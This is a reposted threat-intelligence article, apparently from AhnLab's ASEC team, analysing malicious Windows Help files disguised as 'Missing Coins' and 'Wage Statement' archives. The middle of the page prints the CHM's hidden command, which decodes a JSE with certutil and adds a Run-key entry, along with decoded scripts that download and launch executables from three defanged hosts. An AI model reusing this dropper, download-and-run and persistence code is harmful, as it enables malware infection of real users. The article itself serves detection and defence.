• Home
  • Forums
  • Chat
  • Categories
    • News
    • Tech
    • Gaming
    • Anime

Subscribe to Updates

Get the latest creative news from FooBar about art, design and business.

What's Hot

These Are Not Photos: Beautiful Landscapes Created By New AI

August 17, 2022

Kansas City pastor BERATES ‘cheap’ congregation for not honoring him with a new watch

August 17, 2022

DEF CON Voting Village takes on election conspiracies, disinformation

August 17, 2022
Facebook Twitter Instagram
Visit the Oasis
OasisNews
Facebook Twitter Instagram YouTube
  • Home
  • Forums
  • Chat
  • Categories
    • News
    • Tech
    • Gaming
    • Anime
OasisNews
Home»tech»Malicious Help File Disguised as Missing Coins Report and Wage Statement (*.chm)
tech

Malicious Help File Disguised as Missing Coins Report and Wage Statement (*.chm)

adminBy adminMay 16, 2022No Comments3 Mins Read
Facebook Twitter Pinterest LinkedIn Reddit WhatsApp Email
Share
Facebook Twitter Pinterest Reddit WhatsApp Email


The ASEC analysis team has discovered a continuous distribution of malware disguised as a Windows Help File (*.chm). The most recent CHM file is identical to the file introduced in <APT Attack Being Distributed as Windows Help File (*.chm)> to download the additional malware.

It appears that the CHM file of this type is distributed in the form of a compressed file. The confirmed filenames of the compressed files and internal CHM files are as follows:

Names of Compressed Files Names of Internal CHM Files
Missing Coins Info.zip lost.chm
Data.zip Default.chm
Wage Statement.rar salary.chm
Table 1. Confirmed Filenames

Missing Coins Info.zip file contains the following additional compressed file and Word file.

Figure 1. Files inside Missing Coins Info.zip

The Word file is an innocuous file that contains text related to missing coins (see Figure below).

Figure 2. Word file

Find Missing Coins.rar contains lost.chm, and when it is run, it creates Help with content related to coins and performs malicious activities.

Figure 3. Inside Find Missing Coins.rar
Figure 4. Executed lost.chm

Inside the lost.chm file is the same HTML file and the internal special command introduced in the previous blog post. As such, running the CHM file results in the execution of the cmd command and the creation of Document.dat and Document.jse in the %USERPROFILE%\Links\ folder. The difference from the previous is that Document.jse is created instead of Document.vbs.

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=',cmd, /c echo I0B+XnZBQUFBQT09LW1EfmsnCStoLGIxT2s3K3ByKExuXkRgSnFqbU1rd0QganR/Vl5KYmlAI0AmN2wuUDF4SjE6W35KbVAyR1MrLi80bl5WfmJoTVBPS0VEV1B1WWh3dS13XmtEL2sgK1grUDRPT3drKUp6V1dhcn80bk5jXldzeltDRGw0Q2R/els0YzI0d19EWGErJzhQTH4vRGwuWSxdT2hhXS0nXi9NLy9jbmErcmlAI0AmZFIuOwlgXn5aUzBtVmRuKmkyRDRBQUE9PV4jfkAA > "%USERPROFILE%\Links\Document.dat" & start /MIN certutil -decode "%USERPROFILE%\Links\Document.dat" "%USERPROFILE%\Links\Document.jse" & start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\Document.jse" /f'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

The data that exists in Document.dat is base64-decoded and saved as Document.jse. The decoded JSE data then uses powershell to download the additional file from a certain URL and runs it (see below).

var s=new ActiveXObject("WScript.Shell");
var c="cmd /c powershell iwr -outf %tmp%\\csrss.exe hxxps://foxiebed[.]com/database/db.php?type=1 & start %tmp%\\csrss.exe";
s.run(c,0,false);

Afterward, it adds %USERPROFILE%\Links\Document.jse to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to ensure that the JSE file can be continuously run.

The following CHM files were found subsequently.

  • Wage Statement.rar – salary.chm
Figure 5. Executed salary.chm
(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\sihost.exe hxxps://cerebrovascular[.]net/resource/post & start %tmp%\\sihost.exe mLzio512pQo”,0,false)
Data of decoded Document.jse

This file is compressed with an innocuous PDF file, in a similar fashion to the aforementioned Missing Coins Info.zip.

Figure 8. Innocuous PDF file
Figure 9. Executed Default.chm
(new ActiveXObject(“WScript.Shell”)).run(“cmd /c powershell iwr -outf %tmp%\\lsass.exe hxxps://trueliebe[.]com/kettle/pot & start %tmp%\\lsass.exe Dmzei125oAl”,0,false)
Data of decoded Document.jse

The team could not find extra files because the access to the download URL is currently blocked, but users must stay vigilant as the attack may upload various malicious files in the future.

AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]
Trojan/CHM.Agent

[IOC]
aac428717f4b5ea1bfac9ae0998e661c
7467a360837a85ace6e14acc879e00e5
13446d8496858c2eac78e5e985af605b
hxxps://foxiebed[.]com/database/db.php?type=1
hxxps://cerebrovascular[.]net/resource/post
hxxps://trueliebe[.]com/kettle/pot

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.



Source link

chm Coins Disguised File Malicious missing report statement wage
Share. Facebook Twitter Pinterest LinkedIn WhatsApp Reddit Email
Previous ArticleWheat prices surge to highest in more than two months following India’s ban on exports
Next Article Night sky turns red as lunar eclipse coincides with super moon
admin
admin
  • Website

Related Posts

These Are Not Photos: Beautiful Landscapes Created By New AI

August 17, 2022

DEF CON Voting Village takes on election conspiracies, disinformation

August 17, 2022

An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic

August 17, 2022

Microsoft Disrupted Russia-Linked APT SEABORGIUM

August 17, 2022

Intel Launches NUC 12 Pro ‘Wall Street Canyon’ Mini PCs

August 17, 2022

Galvanize co-working space and coding bootcamp closing Seattle location after seven years – GeekWire

August 17, 2022
0 0 votes
Article Rating
Subscribe
Login
Notify of
guest
guest
0 Comments
Inline Feedbacks
View all comments
Demo
Our Picks

Soneva’s Luxury Resorts Now Accept Crypto Payments – Featured Bitcoin News

August 17, 2022

‘Big Short’ Investor Michael Burry Dumps All Stocks but One After Predicting Market Crash – Featured Bitcoin News

August 17, 2022

Peter Schiff to Liquidate Euro Pacific Bank in Settlement With Puerto Rican Regulator – Featured Bitcoin News

August 14, 2022

Billionaire Mark Cuban Sued for Allegedly Promoting a Massive Crypto ‘Ponzi Scheme’ – Featured Bitcoin News

August 14, 2022
Stay In Touch
  • Facebook
  • Twitter
  • Pinterest
  • Instagram
  • YouTube
  • Vimeo
Don't Miss
tech

These Are Not Photos: Beautiful Landscapes Created By New AI

By adminAugust 17, 2022

“But, I want to visit these places.” Source link

Kansas City pastor BERATES ‘cheap’ congregation for not honoring him with a new watch

August 17, 2022

DEF CON Voting Village takes on election conspiracies, disinformation

August 17, 2022

An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic

August 17, 2022

Subscribe to Updates

Get the latest creative news from SmartMag about art & design.

Top Posts
Advertisement
Demo
Latest Posts
Our Picks

Samsung Galaxy S22 series picks up the August 2022 security update in the US

August 14, 2022

Best Buy's anniversary sale is here: Our top deal picks

August 12, 2022

FTX.US President Brett Harrison Says Crypto Winter Fading Away As Institutional Demand Picks Up

August 10, 2022

Amazon picks up Roomba vacuum maker iRobot for $1.7 billion

August 7, 2022
Blog Posts

TenSura Anime Film Unveils 3 New Cast Members! | Anime News

August 17, 2022

Shangri-La Frontier Gets Anime and Game! | Anime News

August 17, 2022

Welcome to Demon School! Iruma-kun S3 Reveals Premiere Date! | Anime News

August 16, 2022

SK8 The Infinity confirmed the production of a second season and a new OVA

August 15, 2022

Subscribe to Updates

Get the latest creative news from FooBar about art, design and business.

About Us
About Us

Weboasis is the number one home page for your browser on all of the internet. Providing you with links, places to communicate, and news, all in one little OASIS.

Facebook Twitter Instagram Pinterest
  • Home
  • Forums
  • Chat
  • Categories
    • News
    • Tech
    • Gaming
    • Anime
© 2022 ThemeSphere. Designed by ThemeSphere.

Type above and press Enter to search. Press Esc to cancel.

wpDiscuz